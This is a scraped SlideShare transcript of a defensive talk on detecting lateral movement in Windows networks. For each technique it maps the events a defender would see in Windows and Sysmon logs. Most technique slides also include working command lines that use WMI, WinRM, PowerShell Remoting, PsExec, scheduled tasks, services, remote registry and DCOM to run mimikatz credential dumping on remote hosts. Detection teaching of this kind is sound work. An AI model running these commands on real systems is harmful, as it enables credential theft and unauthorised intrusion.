Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Hunting Lateral Movement in
Windows Infrastructure
Teymur Kheirkhabarov
Who Am I
• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex- Infosec dept. head
• Ex- Infosec admin
...
What are we going to talk about
• Different ways to launch executables remotely by using
compromised credentials and opera...
Remote file copy over SMB
• Copy to autostart locations for execution on login or boot
• Copy to different locations for f...
Remote File Copy over SMB – events
sequence on destination side
E2. Special
privileges assigned
to new logon
(Windows EID
...
Remote File Copy over SMB – the most
interesting events
Hunting: search for administrative shares
connections
Windows File Auditing
https://www.malwarearchaeology.com/s/Windows-
File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for files creation/changes
in autostart locations
Remote execution via WMI
• Programmatically
• Using standard tools:
• wmic /node:pc0002 process call create "cmd /c C:User...
Remote execution via WMI – events
sequence on destination side
E2. Special
privileges assigned
to new logon
(Windows EID
4...
Remote execution via WMI – the most
interesting events
Remote execution via WinRM
• Programmatically
• Using Windows Remote Shell (WinRS) tool:
• winrs -r:pc0002.test.local C:Us...
Remote execution via WinRM – events
sequence on destination side
E2. Special
privileges assigned
to new logon
(Windows EID...
Remote execution via WinRM – the most
interesting events
Remote execution via Powershell Remoting
• Powershell scripts
• Powershell cmdline:
• powershell Invoke-Command -ComputerN...
Remote execution via Powershell Remoting
– events sequence on destination side
E2. Special
privileges assigned
to new logo...
Remote execution via Powershell Remoting
– the most interesting events
Remote execution via MMC20.Application
COM
How
• Programmatically
• Using powershell:
powershell -command
"&{$com=[activat...
E2. Special
privileges assigned
to new logon
(Windows EID
4672)
E1. Network Logon
(Windows EID
4624)
E3. svchost.exe
start...
Remote execution via MMC20.Application
COM – the most interesting events
Remote execution via PsExec (& clones, e.g.
PaExec)
• PsExex:
• psexec.exe pc0002 -c mimikatz.exe privilege::debug
sekurls...
E2. Special
privileges assigned
to new logon
(Windows EID
4672)
E1. Network Logon
(Windows EID
4624)
E3. Copying
PSEXESVC....
Remote execution via PsExec (& clones) –
the most interesting events
Hunting: search for PsExec (& clones)
artifacts – services
Hunting: search for PsExec (& clones)
artifacts – access to pipes
Remote execution via PsExec (& clones) –
the most interesting events
Hunting: search for executions in network
logon sessions (WinRM, WMI, PsExec,
Powershell Remoting, MMC20 COM)
Remote execution via ShellWindows COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj =
[activator]...
Remote execution via
ShellBrowserWindow COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj =
[acti...
E2. Special
privileges assigned
to new logon
(Windows EID
4672)
E1. Network Logon
(Windows EID
4624)
Remote execution via ...
Remote execution via via ShellWindows
or ShellBrowserWindow COM – how to
detect???
Payload file is executed in the
session...
Remote execution via Scheduled Tasks
• Programmatically
• Standard command line tools:
• at 172.16.205.14 3:55 C:UsersPubl...
Remote execution via Scheduled Tasks –
events sequence on destination side
E2. Special
privileges assigned
to new logon
(W...
Remote execution via Scheduled Tasks –
the most interesting events
Hunting: search for remotely created or
updated scheduler tasks
Remote execution via Scheduled Tasks –
the most interesting events
Hunting: search for ATSVC pipe
connections
Remote execution via Services
• Programmatically
• Standard command line tool:
• sc pc0002 create "Remote service" binPath...
Remote execution via Services – events
sequence on destination side
E2. Special
privileges assigned
to new logon
(Windows ...
Remote execution via Services – the most
interesting events
Hunting: search for remotely created
services
Remote registry
How
• Programmatically
• Using powershell or reg:
• reg add
pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersi...
Remote registry – events sequence on
destination side
E2. Special
privileges assigned
to new logon
(Windows EID
4672)
E1. ...
Remote Registry – the most interesting
events
Hunting: search for WINREG pipe
connections
Windows Registry Auditing
https://www.malwarearchaeology.com/s/Windows-
Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for changes in autostart
registry keys
Remote WMI subscriptions creation
$filterName = 'TestFilter’
$consumerName = 'TestConsumer’
$exePath = 'C:WindowsSystem32c...
WMI Namespaces Auditing
Remote WMI subscriptions creation –
events sequence on destination side
E2. Special privileges
assigned to new
logon (Wind...
Remote WMI subscriptions creation – the
most interesting events
The End
 There are a lot of ways to remotely run executables in
Windows infrastructure;
 Most of them are based on the n...
Teymur Kheirkhabarov
• heirhabarov@gmail.com
• Twitter @HeirhabarovT
• http://www.linkedin.com/in/teymur-kheirkhabarov-734...
Upcoming SlideShare
Loading in …5
×

Горизонтальные перемещения в инфраструктуре Windows

988 views

Published on

Язык докладаРусскийЗанимается «бумажной» и практической информационной безопасностью более 6 лет. Аналитик SOC в «Лаборатории Касперского». В прошлом руководитель подразделения ИБ на одном из промышленных предприятий. Закончил специалитет и магистратуру СибГАУ им. академика М. Ф. Решетнева (в котором в дальнейшем читал курсы по ИБ). Участник ряда CTF. Выступал на ZeroNights.Теймур Хеирхабаров Теймур Хеирхабаров Управление рисками: как перестать верить в иллюзииFast Track

Published in: Technology

Горизонтальные перемещения в инфраструктуре Windows

  1. 1. Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
  2. 2. Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
  3. 3. What are we going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
  4. 4. Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools (copy, xcopy, ropocopy…): • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
  5. 5. Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
  6. 6. Remote File Copy over SMB – the most interesting events
  7. 7. Hunting: search for administrative shares connections
  8. 8. Windows File Auditing https://www.malwarearchaeology.com/s/Windows- File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
  9. 9. Hunting: search for files creation/changes in autostart locations
  10. 10. Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  11. 11. Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
  12. 12. Remote execution via WMI – the most interesting events
  13. 13. Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  14. 14. Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
  15. 15. Remote execution via WinRM – the most interesting events
  16. 16. Remote execution via Powershell Remoting • Powershell scripts • Powershell cmdline: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • Enter-PSSession -ComputerName COMPUTER -Credential USER How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  17. 17. Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
  18. 18. Remote execution via Powershell Remoting – the most interesting events
  19. 19. Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
  20. 20. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
  21. 21. Remote execution via MMC20.Application COM – the most interesting events
  22. 22. Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
  23. 23. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
  24. 24. Remote execution via PsExec (& clones) – the most interesting events
  25. 25. Hunting: search for PsExec (& clones) artifacts – services
  26. 26. Hunting: search for PsExec (& clones) artifacts – access to pipes
  27. 27. Remote execution via PsExec (& clones) – the most interesting events
  28. 28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
  29. 29. Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  30. 30. Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  31. 31. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
  32. 32. Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
  33. 33. Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
  34. 34. Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting events in Microsoft-Windows-TaskScheduler/Operational log
  35. 35. Remote execution via Scheduled Tasks – the most interesting events
  36. 36. Hunting: search for remotely created or updated scheduler tasks
  37. 37. Remote execution via Scheduled Tasks – the most interesting events
  38. 38. Hunting: search for ATSVC pipe connections
  39. 39. Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  40. 40. Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
  41. 41. Remote execution via Services – the most interesting events
  42. 42. Hunting: search for remotely created services
  43. 43. Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
  44. 44. Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
  45. 45. Remote Registry – the most interesting events
  46. 46. Hunting: search for WINREG pipe connections
  47. 47. Windows Registry Auditing https://www.malwarearchaeology.com/s/Windows- Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
  48. 48. Hunting: search for changes in autostart registry keys
  49. 49. Remote WMI subscriptions creation $filterName = 'TestFilter’ $consumerName = 'TestConsumer’ $exePath = 'C:WindowsSystem32calc.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter - NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$ Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
  50. 50. WMI Namespaces Auditing
  51. 51. Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
  52. 52. Remote WMI subscriptions creation – the most interesting events
  53. 53. The End  There are a lot of ways to remotely run executables in Windows infrastructure;  Most of them are based on the native capabilities of the Windows operating system;  Almost all of them can be detected via Windows or Sysmon logs analysis;  Out of scope: • exploitation of vulnerabilities; • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).
  54. 54. Teymur Kheirkhabarov • heirhabarov@gmail.com • Twitter @HeirhabarovT • http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/

×